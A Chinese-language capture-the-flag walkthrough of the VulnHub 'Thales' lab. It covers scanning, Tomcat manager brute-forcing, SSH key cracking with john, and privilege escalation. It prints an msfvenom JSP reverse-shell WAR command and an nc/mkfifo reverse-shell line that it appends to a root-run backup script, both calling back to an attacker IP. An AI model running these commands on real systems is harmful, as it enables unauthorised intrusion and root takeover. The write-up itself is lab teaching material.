一.环境搭建

1.靶场描述

Description : Open your eyes and change your perspective
includes 2 flags:user.txt and root.txt.
Telegram: @machineboy141 (for any hint)
This works better with VIrtualBox rathe than VMware

2.靶场地址

https://www.vulnhub.com/entry/thales-1,749/

3.启动靶场

Thales靶机在VMware运行会出现bug,所以我们在VirtualBox运行。

虚拟机开启之后界面如上，我们不知道ip，需要自己探活，因为我们在VirtualBox运行所以网段发生了变化,网段知道：192.168.1.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场，靶场IP为：192.168.1.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.1.0/24

arp-scan -l

靶场真实ip地址为192.168.1.13

(2)探测端口及服务

nmap -p- -sV 192.168.1.13

发现开启了22端口,OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
发现开启了8080端口,Apache Tomcat 9.0.52

(3)web指纹识别

whatweb -v 192.168.1.13:8080

3.渗透测试

(1)访问web服务

http://192.168.1.13:8080

我们可以看到是Tomcat

(2)扫描web服务

1)棱洞3.0指纹识别

./EHole_linux_amd64 finger -u http://192.168.1.13:8080

2)nikto扫描网站结构

nikto -h http://192.168.1.13:8080

3)dirsearch目录扫描

dirsearch -u 192.168.1.13:8080 -e * -x 403 --random-agent

我们扫描到一个登录页面

http://192.168.1.13:8080/manager

目前，我们掌握的信息是一个tomcat框架和一个登录页面，因为tomcat 有管理登录页面，于是尝试爆破

(3)渗透测试

1)msf爆破

search login tomcat

show options

set RHOSTS 192.168.1.13

爆破出来一个用户名和密码

tomcat:role1

2)登录

我们可以看到登录成功

3)反弹shell

我们可以看到/shell和上传页面，那么我们进行shell,在 web 应用程序部署界面尝试在上传 war 包反弹 shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.9 LPORT=666666 -f war -o MS02423.war

我们进行上传

上传成功后，在应用程序列表中看到已成功部署了 war 后门，点击访问后反弹

我们可以看到反弹成功

我们进行提权，发现需要密码，我们进行查找

4)执行脚本

一般情况下，我们首先去home目录下查看，然后在去/var/www/html/目录下查看有没有什么线索，我们看到了thales命令，我们进行查看

我们看到了两个txt文件，模式里面提示我们,一个flag在user.txt，一个在root.txt里面，那么我们进行查看user.txt文件，但是需要thales权限，我们查看notes.txt文件，notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh

includes 2 flags:user.txt and root.txt.

我们去执行这个脚本，但是执行之后却发现没有如何变化

5)ssh 私钥文件

我们在thales目录下发现了隐藏的.ssh文件，我们进行查看

这样看太难受了，我们进行交互模式进行查看

我们可以看到公钥，我们进行查看

我们把它保存下来，用john进行爆破

6)john爆破

将私钥文件保存到攻击机，利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件，然后进行爆破，得到密码为 vodka06

7)查看user.txt文件

我们进行登录thales用户名

我们获取到第一个flag，还有一个flag在root.txt里面，我们进行提权

8)提权

之前我们看到的那个脚本还没有查看内容，现在我们查看一下那个备份文件的代码

是一个shell文件，并且是能运行命令的，我们是可以编辑的，并且是root用户运行的，我们插入一串反弹shell的命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 5555 >/tmp/f" >> backup.sh

等一会可以看到反弹成功，我们查看flag即可

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解（linux & win）

7.nikto工具的使用

8.dirsearch目录扫描

9.msf工具使用

10.ssh私钥文件

11.john爆破密码

12.反弹shell